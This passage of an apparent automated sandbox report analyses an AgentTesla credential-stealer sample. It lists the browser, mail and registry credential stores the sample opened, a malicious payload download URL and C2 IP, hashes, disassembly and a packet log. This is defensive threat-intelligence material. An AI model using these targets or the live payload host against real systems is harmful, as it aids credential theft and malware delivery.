          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
          Tries to steal Mail credentials (via file access)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
          Source: Yara match | File source: 00000004.00000002.603404281.000000001DD21000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6504, type: MEMORY

          Remote Access Functionality:

          Yara detected AgentTesla
          Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 6504, type: MEMORY

          Mitre Att&ck Matrix

          Techniques listed per tactic (the trailing number after a technique is the signature count shown in the matrix):
          • Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts
          • Execution: Windows Management Instrumentation 211, Scheduled Task/Job, At (Linux), At (Windows), Cron
          • Persistence: DLL Side-Loading 1, Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script
          • Privilege Escalation: Process Injection 112, DLL Side-Loading 1, Logon Script (Windows), Logon Script (Mac), Network Logon Script
          • Defense Evasion: Virtualization/Sandbox Evasion 34, Disable or Modify Tools 1, Process Injection 112, Obfuscated Files or Information 1, DLL Side-Loading 1
          • Credential Access: OS Credential Dumping 1, LSASS Memory, Security Account Manager, NTDS, LSA Secrets
          • Discovery: Security Software Discovery 731, Virtualization/Sandbox Evasion 34, Process Discovery 2, Application Window Discovery 1, System Information Discovery 424
          • Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH
          • Collection: Email Collection 1, Archive Collected Data 1, Data from Local System 1, Input Capture, Keylogging
          • Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits
          • Command and Control: Encrypted Channel 1, Ingress Tool Transfer 1, Non-Application Layer Protocol 1, Application Layer Protocol 11, Fallback Channels
          • Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication
          • Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
          • Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings

          Behavior Graph

          Screenshots


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          SKM_C3350191107102300.exe | 22% | Virustotal |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
          http://DynDns.comDynDNS | 0% | URL Reputation | safe
          http://sHYyUE.com | 0% | Virustotal |
          http://sHYyUE.com | 0% | Avira URL Cloud | safe
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
          http://185.222.58.152/EDUORIGIN_baxLdLkc20.bin | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          http://185.222.58.152/EDUORIGIN_baxLdLkc20.bin | true | Avira URL Cloud: safe | unknown

          URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://127.0.0.1:HTTP/1.1 | RegAsm.exe, 00000004.00000002.603404281.000000001DD21000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
          http://DynDns.comDynDNS | RegAsm.exe, 00000004.00000002.603404281.000000001DD21000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://sHYyUE.com | RegAsm.exe, 00000004.00000002.603404281.000000001DD21000.00000004.00000001.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
          https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | RegAsm.exe, 00000004.00000002.603404281.000000001DD21000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown

          Contacted IPs

          Public

          IP | Domain | Country | ASN | ASN Name | Malicious
          185.222.58.152 | unknown | Netherlands | 51447 | ROOTLAYERNETNL | true

          General Information

          Joe Sandbox Version: 31.0.0 Emerald
          Analysis ID: 356107
          Start date: 22.02.2021
          Start time: 15:17:08
          Joe Sandbox Product: CloudBasic
          Overall analysis duration: 0h 5m 56s
          Hypervisor based Inspection enabled: false
          Report type: full
          Sample file name: SKM_C3350191107102300.exe
          Cookbook file name: default.jbs
          Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes: 24
          Number of new started drivers analysed: 0
          Number of existing processes analysed: 0
          Number of existing drivers analysed: 0
          Number of injected processes analysed: 0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode: default
          Analysis stop reason: Timeout
          Detection: MAL
          Classification: mal100.rans.troj.spyw.evad.winEXE@4/0@0/1
          EGA Information: Failed
          HDC Information:
          • Successful, ratio: 21.1% (good quality ratio 15.9%)
          • Quality average: 37.3%
          • Quality standard deviation: 30.4%
          HCA Information:
          • Successful, ratio: 97%
          • Number of executed functions: 88
          • Number of non-executed functions: 16
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .exe
          Warnings:
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

          Time | Type | Description
          15:18:31 | API Interceptor | 656x Sleep call for process: RegAsm.exe modified

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASN

          Match: ROOTLAYERNETNL

          Associated Sample Name / URL | Detection | Context
          Jagtap Trading - order #JEW-39-16.02.2021.exe | malicious | 45.137.22.36
          AKBANK E-DEKONT.exe | malicious | 45.137.22.52
          New Order.exe | malicious | 45.137.22.102
          New Order.exe | malicious | 45.137.22.102
          LnkxrWO6yvd9qaJ.exe | malicious | 185.222.58.156
          tuesdacrypted.exe | malicious | 185.222.57.68
          000009000000900.exe | malicious | 45.137.22.52
          TT.exe | malicious | 185.222.57.213
          Cotización de factura.exe | malicious | 45.137.22.52
          kart-009000000..pdf...exe | malicious | 45.137.22.52
          PO-OIOI09000.exe | malicious | 45.137.22.52
          090000090000-090.exe | malicious | 45.137.22.52
          kart gecmisi.exe | malicious | 45.137.22.52
          000000000900R.exe | malicious | 45.137.22.52
          0000000000009000.exe | malicious | 45.137.22.52
          090887000008000000.exe | malicious | 45.137.22.52
          PURCHASE ORDER098090.exe | malicious | 45.137.22.52
          rawwwwwwwcrypted.exe | malicious | 185.222.57.68
          REMOUOOO9O9.exe | malicious | 45.137.22.52
          RFQ-OM-3994 - Closing Date 31.12.2020 - MEPF-PO-2020-060PDF.exe | malicious | 185.222.58.156

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          No created / dropped files found

          Static File Info

          General

          File type: PE32 executable (GUI) Intel 80386, for MS Windows
          Entropy (8bit): 4.793930759240635
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.15%
          • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name: SKM_C3350191107102300.exe
          File size: 61440
          MD5: 58bb0368bc9cf6ec86c266f54cdefeeb
          SHA1: 1b9beee4bf56a4d5b31654b7c7404df5ff13f2fe
          SHA256: d8eb1f98c2e365646d4b849ce9463769f173f7b4c95ea4dc705429a1798e1cfb
          SHA512: 3078cfa6d4bfd47981bdac73d8cd41a4d37a8a076d01920dea680f643e683d07750ad9ee623976df6f4df76ccf37d03ae8899e7a88b976a3d28409735e936343
          SSDEEP: 768:IZH/LgmvpoLA7SIKJrj7+I6vbfzrkEiV:mz5yLA7SIKZ6vTc
          File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L...m?.V.....................0....................@................

          File Icon

          Icon Hash: 20047c7c70f0e004

          Static PE Info

          General

          Entrypoint: 0x4012c4
          Entrypoint Section: .text
          Digitally signed: false
          Imagebase: 0x400000
          Subsystem: windows gui
          Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          DLL Characteristics:
          Time Stamp: 0x56A83F6D [Wed Jan 27 03:54:21 2016 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major: 4
          OS Version Minor: 0
          File Version Major: 4
          File Version Minor: 0
          Subsystem Version Major: 4
          Subsystem Version Minor: 0
          Import Hash: f8fb5be8a6ea86fb9d04da61d8bfeb3a

          Entrypoint Preview

          Instruction
          push 00401504h
          call 00007F7E70845993h
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          xor byte ptr [eax], al
          add byte ptr [eax], al
          cmp byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          xchg eax, ebx
          mov eax, dword ptr [E42F2C80h]
          inc edi
          popfd
          add al, 37h
          adc byte ptr [eax], 0000005Ah
          mov edi, 0000006Ah
          add byte ptr [eax], al
          add byte ptr [ecx], al
          add byte ptr [eax], al
          add byte ptr [eax+00h], cl
          push es
          inc eax
          add dword ptr [ecx], 41h
          insb
          outsb
          add byte ptr [esi+000002FBh], dh
          add byte ptr [eax], al
          dec esp
          xor dword ptr [eax], eax
          pop es
          mov dh, 00h
          pop edi
          retf 9645h
          dec esi
          mov ecx, dword ptr [edi-2EF3FE6Eh]
          mov dword ptr [ebp-42h], edi
          pop es
          xchg eax, ebx
          adc al, 08h
          movsd
          loopne 00007F7E708459EAh
          stosd
          cdq
          clts
          mov ch, B4h
          clc
          ret
          cmp cl, byte ptr [edi-53h]
          xor ebx, dword ptr [ecx-48EE309Ah]
          or al, 00h
          stosb
          add byte ptr [eax-2Dh], ah
          xchg eax, ebx
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          xchg eax, ebp
          add dword ptr [eax], eax
          add byte ptr [ebx+00h], cl
          add byte ptr [eax], al
          add byte ptr [ebx], cl
          add byte ptr [edx+49h], al
          dec esp
          inc ecx
          inc edi
          inc esp
          inc ebp
          push ebx
          push ebx
          dec esi
          inc ebp
          add byte ptr [52000901h], cl
          inc ebp
          inc esi
          inc ebp
          inc ebx
          push esp
          dec edi
          push edx
          dec ecx
          add byte ptr [ecx], bl

          Data Directories

          Name | Virtual Address | Virtual Size | Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc024 | 0x28 | .text
          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf000 | 0x9b4 | .rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x228 | 0x20 |
          IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0xd0 | .text
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

          Sections

          Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
          .text | 0x1000 | 0xb3f8 | 0xc000 | False | 0.454182942708 | data | 5.50136713696 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          .data | 0xd000 | 0x118c | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
          .rsrc | 0xf000 | 0x9b4 | 0x1000 | False | 0.18017578125 | data | 2.10544721685 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

          Resources

          Name | RVA | Size | Type | Language | Country
          RT_ICON | 0xf884 | 0x130 | data | |
          RT_ICON | 0xf59c | 0x2e8 | data | |
          RT_ICON | 0xf474 | 0x128 | GLS_BINARY_LSB_FIRST | |
          RT_GROUP_ICON | 0xf444 | 0x30 | data | |
          RT_VERSION | 0xf150 | 0x2f4 | data | Hungarian | Hungary

          Imports

          DLL | Import
          MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaVarMove, __vbaAryMove, __vbaFreeVar, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, __vbaNew2, __vbaVar2Vec, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaVarDup, _CIatan, __vbaCastObj, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

          Version Infos

          Description | Data
          Translation | 0x040e 0x04b0
          LegalCopyright | Copyright (C) AC
          InternalName | Klysnerstorv8
          FileVersion | 1.00
          CompanyName | AC
          LegalTrademarks | Copyright (C) AC
          Comments | AC
          ProductName | AC
          ProductVersion | 1.00
          FileDescription | AC
          OriginalFilename | Klysnerstorv8.exe

          Possible Origin

          Language of compilation system | Country where language is spoken
          Hungarian | Hungary

          Network Behavior

          Snort IDS Alerts

          Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
          02/22/21-15:18:23.821649 | TCP | 2018752 | ET TROJAN Generic .bin download from Dotted Quad | 49726 | 80 | 192.168.2.6 | 185.222.58.152

          Network Port Distribution

          TCP Packets

          Timestamp | Source Port | Dest Port | Source IP | Dest IP
          Feb 22, 2021 15:18:23.918500900 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.964941025 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965034008 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.965125084 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965145111 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965161085 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965177059 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.965183020 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965204954 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965220928 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965223074 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.965238094 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965255976 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965270042 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965282917 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965286016 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.965302944 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965315104 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.965323925 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965341091 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965358973 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.965361118 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965379953 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965396881 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.965415955 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:23.965428114 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:23.965451002 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.011744022 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.011780024 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.011790991 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.011991978 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.014591932 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014625072 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014642000 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014662027 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014687061 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014705896 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014730930 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014756918 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014779091 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014800072 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014818907 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014842033 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014864922 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014889002 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014914036 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014939070 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014961958 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014978886 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.014997005 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.015012980 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.015031099 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.015048027 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.015067101 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.015083075 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.015100002 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.015115976 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.015134096 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.015150070 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.015165091 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.015181065 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.015196085 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.015415907 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.058439016 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.058478117 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.058501959 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.058525085 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.058532000 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.058543921 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.058562994 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.058626890 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.061870098 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.061903954 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.061923027 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.061944008 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.061964989 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.061985016 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.061989069 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062011003 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062033892 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062051058 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062053919 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062077045 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062084913 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062098026 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062110901 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062119961 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062140942 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062153101 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062161922 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062186956 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062195063 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062210083 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062216997 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062231064 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062251091 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062259912 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062273979 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062294960 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062298059 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062316895 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062331915 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062338114 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062362909 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062366009 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062386036 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062407017 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062412024 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062428951 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062449932 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062455893 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062479019 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062484026 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062500954 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062521935 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062521935 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062549114 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062556982 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062573910 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062596083 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062597990 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062617064 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062633038 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.062640905 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.062690973 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.105156898 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.105214119 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.105238914 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.105263948 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.105289936 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.105312109 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.105334997 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.105356932 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.105374098 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.105402946 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.105465889 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109148979 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109195948 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109220982 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109247923 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109272957 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109296083 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109318972 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109317064 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109344006 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109366894 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109395981 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109401941 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109411955 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109428883 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109438896 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109464884 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109481096 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109493971 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109522104 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109536886 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109544039 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109564066 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109569073 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109595060 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109600067 CET4972680192.168.2.6185.222.58.152
          Feb 22, 2021 15:18:24.109620094 CET8049726185.222.58.152192.168.2.6
          Feb 22, 2021 15:18:24.109621048 CET4972680192.168.2.6185.222.58.152
